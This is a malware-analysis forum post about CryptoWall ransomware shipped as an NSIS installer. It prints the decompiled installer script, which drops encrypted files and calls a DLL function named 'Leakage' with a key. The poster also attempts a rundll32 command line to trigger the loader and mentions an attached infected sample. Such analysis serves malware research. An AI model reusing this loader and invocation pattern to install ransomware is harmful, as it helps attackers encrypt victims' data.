CryptoWall being distributed using a NSIS installer. As explained by Brad Duncan in his ISC handler's diary, cryptowall now being distributed via exploit kits. Payload is a NSIS installer.
Installer contained the files MuskegCommuneKinesthesia, and suppress.navigation.xml, and skiplanes.dll. Sample from Brad's diary is attached to post.
The extracted NSIS installer config is:
My guess is the leakage function decrypts the contents of the suppress.navigation.xml, which becomes the payload to inject?
I will leave that up to you reversers to figure that part out :)
Installer contained the files MuskegCommuneKinesthesia, and suppress.navigation.xml, and skiplanes.dll. Sample from Brad's diary is attached to post.
The extracted NSIS installer config is:
Code: Select all
MuskegCommuneKinesthesia and suppress.navigation.xml appear to contain encrypted content. I am far from experienced with NSIS, but from the script it appears that CW is being installed via this command:; NSIS script NSIS-3
; Install
SetCompressor /SOLID lzma
SetCompressorDictSize 8
; --------------------
; HEADER SIZE: 8765
; START HEADER SIZE: 300
; MAX STRING LENGTH: 1024
; STRING CHARS: 3171
OutFile [NSIS].exe
!include WinMessages.nsh
InstallDirRegKey HKCU Software\$$R1 $$7
LicenseBkColor /windows
; --------------------
; LANG TABLES: 1
; LANG STRINGS: 78
Name bookworms
BrandingText "Nullsoft Install System v3.0b1"
; LANG: 1033
LangString LSTR_0 1033 "Nullsoft Install System v3.0b1"
LangString LSTR_1 1033 "$(LSTR_2) Setup"
LangString LSTR_2 1033 bookworms
LangString LSTR_3 1033 "Space available: "
LangString LSTR_4 1033 "Space required: "
LangString LSTR_5 1033 "Can't write: "
LangString LSTR_8 1033 "Could not find symbol: "
LangString LSTR_9 1033 "Could not load: "
LangString LSTR_13 1033 "Delete file: "
LangString LSTR_14 1033 "Delete on reboot: "
LangString LSTR_17 1033 "Error decompressing data! Corrupted installer?"
LangString LSTR_21 1033 "Extract: "
LangString LSTR_22 1033 "Extract: error writing to file "
LangString LSTR_24 1033 "No OLE for: "
LangString LSTR_25 1033 "Output folder: "
LangString LSTR_26 1033 "Remove folder: "
LangString LSTR_29 1033 "Skipped: "
LangString LSTR_30 1033 "Copy Details To Clipboard"
LangString LSTR_32 1033 B
LangString LSTR_33 1033 K
LangString LSTR_34 1033 M
LangString LSTR_35 1033 G
LangString LSTR_36 1033 "If you accept the terms of the agreement, click I Agree to continue. You must accept the agreement to install $(LSTR_77)."
LangString LSTR_37 1033 "License Agreement"
LangString LSTR_38 1033 "Please review the license terms before installing $(LSTR_77)."
LangString LSTR_39 1033 "Press Page Down to see the rest of the agreement."
LangString LSTR_40 1033 "Choose Components"
LangString LSTR_41 1033 "Choose which features of $(LSTR_77) you want to install."
LangString LSTR_42 1033 Description
LangString LSTR_43 1033 "Position your mouse over a component to see its description."
LangString LSTR_44 1033 "Choose Install Location"
LangString LSTR_45 1033 "Choose the folder in which to install $(LSTR_77)."
LangString LSTR_46 1033 Installing
LangString LSTR_47 1033 "Please wait while $(LSTR_77) is being installed."
LangString LSTR_48 1033 "Installation Complete"
LangString LSTR_49 1033 "Setup was completed successfully."
LangString LSTR_50 1033 "Installation Aborted"
LangString LSTR_51 1033 "Setup was not completed successfully."
LangString LSTR_52 1033 "MS Shell Dlg"
LangString LSTR_53 1033 8
LangString LSTR_54 1033 "Are you sure you want to quit $(LSTR_2) Setup?"
LangString LSTR_55 1033 "Error opening file for writing: $\r$\n$\r$\n$0$\r$\n$\r$\nClick Abort to stop the installation,$\r$\nRetry to try again, or$\r$\nIgnore to skip this file."
LangString LSTR_56 1033 $R1
LangString LSTR_57 1033 Custom
LangString LSTR_58 1033 Cancel
LangString LSTR_59 1033 "< &Back"
LangString LSTR_60 1033 "I &Agree"
LangString LSTR_61 1033 "Click Next to continue."
LangString LSTR_62 1033 "Check the components you want to install and uncheck the components you don't want to install. $_CLICK"
LangString LSTR_63 1033 "Select the type of install:"
LangString LSTR_64 1033 "Or, select the optional components you wish to install:"
LangString LSTR_65 1033 "Select components to install:"
LangString LSTR_66 1033 "&Next >"
LangString LSTR_67 1033 "Setup will install $(LSTR_77) in the following folder. To install in a different folder, click Browse and select another folder. $_CLICK"
LangString LSTR_68 1033 "Destination Folder"
LangString LSTR_69 1033 B&rowse...
LangString LSTR_70 1033 "Select the folder to install $(LSTR_77) in:"
LangString LSTR_71 1033 &Install
LangString LSTR_72 1033 "Click Install to start the installation."
LangString LSTR_73 1033 "Show &details"
LangString LSTR_74 1033 Completed
LangString LSTR_75 1033 " "
LangString LSTR_76 1033 &Close
LangString LSTR_77 1033 bookworms
; --------------------
; VARIABLES: 34
Var _0_
Var _1_
Var _2_
Var _3_
Var _4_
Var _5_
Var _6_
Var _7_
Var _8_
Var _9_
Var _10_
Var _11_
Var _12_
Var _13_
Var _14_
Var _15_
Var _16_
Var _17_
Var _18_
Var _19_
Var _20_
Var _21_
Var _22_
Var _23_
Var _24_
Var _25_
Var _26_
Var _27_
Var _28_
Var _29_
Var _30_
Var _31_
Var _32_
Var _33_
InstType $(LSTR_57) ; Custom
InstallDir $TEMP
; wininit = $WINDIR\wininit.ini
; --------------------
; PAGES: 5
; Page 0
Page license func_0 func_3 func_9 /ENABLECANCEL
LicenseText $(LSTR_36) $(LSTR_60) ; "If you accept the terms of the agreement, click I Agree to continue. You must accept the agreement to install $(LSTR_77)." "I &Agree" bookworms
LicenseData [LICENSE].txt
; Page 1
Page components func_10 func_13 func_27 /ENABLECANCEL
ComponentsText $(LSTR_62) $(LSTR_63) $(LSTR_64) ; "Check the components you want to install and uncheck the components you don't want to install. $_CLICK" "Select the type of install:" "Or, select the optional components you wish to install:"
; Page 2
Page directory func_28 func_31 func_39 /ENABLECANCEL
DirText $(LSTR_67) $(LSTR_68) $(LSTR_69) $(LSTR_70) ; "Setup will install $(LSTR_77) in the following folder. To install in a different folder, click Browse and select another folder. $_CLICK" "Destination Folder" B&rowse... "Select the folder to install $(LSTR_77) in:" bookworms bookworms
DirVar $CMDLINE
; Page 3
Page instfiles func_40 func_43 func_49
CompletedText $(LSTR_74) ; Completed
DetailsButtonText $(LSTR_73) ; "Show &details"
/*
; Page 4
Page COMPLETED
*/
; --------------------
; SECTIONS: 1
; COMMANDS: 127
Function func_0 ; Page 0, Pre
SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_37) ; "License Agreement"
SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_38) ; "Please review the license terms before installing $(LSTR_77)." bookworms
FunctionEnd
Function func_3 ; Page 0, Show
FindWindow $_12_ "#32770" "" $HWNDPARENT
GetDlgItem $_13_ $_12_ 1040
GetDlgItem $_14_ $_12_ 1006
GetDlgItem $_15_ $_12_ 1000
SendMessage $_13_ ${WM_SETTEXT} 0 STR:$(LSTR_39) ; "Press Page Down to see the rest of the agreement."
FunctionEnd
Function func_9 ; Page 0, Leave
FunctionEnd
Function func_10 ; Page 1, Pre
SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_40) ; "Choose Components"
SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_41) ; "Choose which features of $(LSTR_77) you want to install." bookworms
FunctionEnd
Function func_13 ; Page 1, Show
FindWindow $_16_ "#32770" "" $HWNDPARENT
GetDlgItem $_17_ $_16_ 1006
GetDlgItem $_18_ $_16_ 1021
GetDlgItem $_19_ $_16_ 1022
GetDlgItem $_20_ $_16_ 1017
GetDlgItem $_21_ $_16_ 1032
GetDlgItem $_22_ $_16_ 1042
GetDlgItem $_24_ $_16_ 1043
GetDlgItem $_25_ $_16_ 1023
SendMessage $_22_ ${WM_SETTEXT} 0 STR:$(LSTR_42) ; Description
EnableWindow $_24_ 0
SendMessage $_24_ ${WM_SETTEXT} 0 STR:$(LSTR_43) ; "Position your mouse over a component to see its description."
StrCpy $_23_ $(LSTR_43) ; "Position your mouse over a component to see its description."
FunctionEnd
Function func_27 ; Page 1, Leave
FunctionEnd
Function func_28 ; Page 2, Pre
SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_44) ; "Choose Install Location"
SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_45) ; "Choose the folder in which to install $(LSTR_77)." bookworms
FunctionEnd
Function func_31 ; Page 2, Show
FindWindow $_26_ "#32770" "" $HWNDPARENT
GetDlgItem $_27_ $_26_ 1006
GetDlgItem $_28_ $_26_ 1020
GetDlgItem $_29_ $_26_ 1019
GetDlgItem $_30_ $_26_ 1001
GetDlgItem $_31_ $_26_ 1023
GetDlgItem $_32_ $_26_ 1024
FunctionEnd
Function func_39 ; Page 2, Leave
FunctionEnd
Function func_40 ; Page 3, Pre
SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_46) ; Installing
SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_47) ; "Please wait while $(LSTR_77) is being installed." bookworms
FunctionEnd
Function func_43 ; Page 3, Show
FindWindow $_33_ "#32770" "" $HWNDPARENT
GetDlgItem $_34_ $_33_ 1006
GetDlgItem $_35_ $_33_ 1004
GetDlgItem $_36_ $_33_ 1027
GetDlgItem $_37_ $_33_ 1016
FunctionEnd
Function func_49 ; Page 3, Leave
IfAbort label_53
SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_48) ; "Installation Complete"
SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_49) ; "Setup was completed successfully."
Goto label_55
label_53:
SendMessage $_0_ ${WM_SETTEXT} 0 STR:$(LSTR_50) ; "Installation Aborted"
SendMessage $_2_ ${WM_SETTEXT} 0 STR:$(LSTR_51) ; "Setup was not completed successfully."
label_55:
IfAbort label_56
label_56:
FunctionEnd
Function .onGUIInit
GetDlgItem $_0_ $HWNDPARENT 1037
CreateFont $_1_ $(LSTR_52) $(LSTR_53) 700 ; "MS Shell Dlg" 8
SendMessage $_0_ ${WM_SETFONT} $_1_ 0
GetDlgItem $_2_ $HWNDPARENT 1038
SetCtlColors $_0_ "" 0xFFFFFF
SetCtlColors $_2_ "" 0xFFFFFF
GetDlgItem $_3_ $HWNDPARENT 1034
SetCtlColors $_3_ "" 0xFFFFFF
GetDlgItem $_4_ $HWNDPARENT 1039
SetCtlColors $_4_ "" 0xFFFFFF
GetDlgItem $_6_ $HWNDPARENT 1028
SetCtlColors $_6_ /BRANDING ""
GetDlgItem $_5_ $HWNDPARENT 1256
SetCtlColors $_5_ /BRANDING ""
SendMessage $_5_ ${WM_SETTEXT} 0 "STR:$(LSTR_0) " ; "Nullsoft Install System v3.0b1"
GetDlgItem $_7_ $HWNDPARENT 1035
GetDlgItem $_8_ $HWNDPARENT 1045
GetDlgItem $_9_ $HWNDPARENT 1
GetDlgItem $_10_ $HWNDPARENT 2
GetDlgItem $_11_ $HWNDPARENT 3
FunctionEnd
Function .onUserAbort
MessageBox MB_YESNO|MB_ICONEXCLAMATION $(LSTR_54) IDYES label_80 ; "Are you sure you want to quit $(LSTR_2) Setup?" bookworms
Abort
label_80:
FunctionEnd
Function .onInit
StrCpy $R1 2
label_82:
DetailPrint $7
IntCmp $7 13105745 0 0 label_87
DetailPrint $7
IntOp $7 $7 + $R1
Goto label_82
label_87:
SetOutPath $INSTDIR
File MuskegCommuneKinesthesia
File suppress.navigation.xml
File skiplanes.dll
StrCpy $R7 MisbehaviourGittern
StrCpy $6 MuskegCommuneKinesthesia
System::Call "skiplanes::Leakage(i 475,m $\"$6$\",i .r0,m $\"$INSTDIR\suppress.navigation.xml$\",m $\"$R7$\")"
; Call Initialize_____Plugins
; SetOverwrite off
; File $PLUGINSDIR\System.dll
; SetDetailsPrint lastused
; Push "skiplanes::Leakage(i 475,m $\"$6$\",i .r0,m $\"$INSTDIR\suppress.navigation.xml$\",m $\"$R7$\")"
; CallInstDLL $PLUGINSDIR\System.dll Call
Quit
FunctionEnd
Section bookworms ; Section_0
SetOutPath $INSTDIR
WriteRegStr HKCU Software\$R1 $7 $INSTDIR
SectionEnd
Function .onMouseOverSection
StrCmp $0 -1 0 label_108
SendMessage $_24_ ${WM_SETTEXT} 0 STR:
EnableWindow $_24_ 0
SendMessage $_24_ ${WM_SETTEXT} 0 STR:$_23_
Goto label_112
label_108:
StrCmp $0 0 0 label_112
SendMessage $_24_ ${WM_SETTEXT} 0 STR:
EnableWindow $_24_ 1
SendMessage $_24_ ${WM_SETTEXT} 0 STR:$(LSTR_56) ; $R1
label_112:
FunctionEnd
/*
Function Initialize_____Plugins
SetDetailsPrint none
StrCmp $PLUGINSDIR "" 0 label_123
Push $0
SetErrors
GetTempFileName $0
Delete $0
CreateDirectory $0
IfErrors label_124
StrCpy $PLUGINSDIR $0
Pop $0
label_123:
Return
label_124:
MessageBox MB_OK|MB_ICONSTOP "Error! Can't initialize plug-ins directory. Please try again later." /SD IDOK
Quit
FunctionEnd
*/
; --------------------
; UNREFERENCED STRINGS:
/*
1 ProgramFilesDir
17 CommonFilesDir
32 "C:\Program Files"
49 $PROGRAMFILES
53 "$PROGRAMFILES\Common Files"
70 $COMMONFILES
*/
Code: Select all
When trying to convert it to a rundll32 line, I think it is something like: System::Call "skiplanes::Leakage(i 475,m $\"$6$\",i .r0,m $\"$INSTDIR\suppress.navigation.xml$\",m $\"$R7$\")"Code: Select all
Something is missing though as executing the above command does not perform the injection/install. Not sure what .r0 represents other than it is supposed to be an integer.rundll32.exe skiplanes.dll,Leakage 475 MuskegCommuneKinesthesia .ro "<path_to>\suppress.navigation.xml" MisbehaviourGitternMy guess is the leakage function decrypts the contents of the suppress.navigation.xml, which becomes the payload to inject?
I will leave that up to you reversers to figure that part out :)
Attachments
infected
(428 KiB) Downloaded 120 times
(428 KiB) Downloaded 120 times
BleepingComputer.com
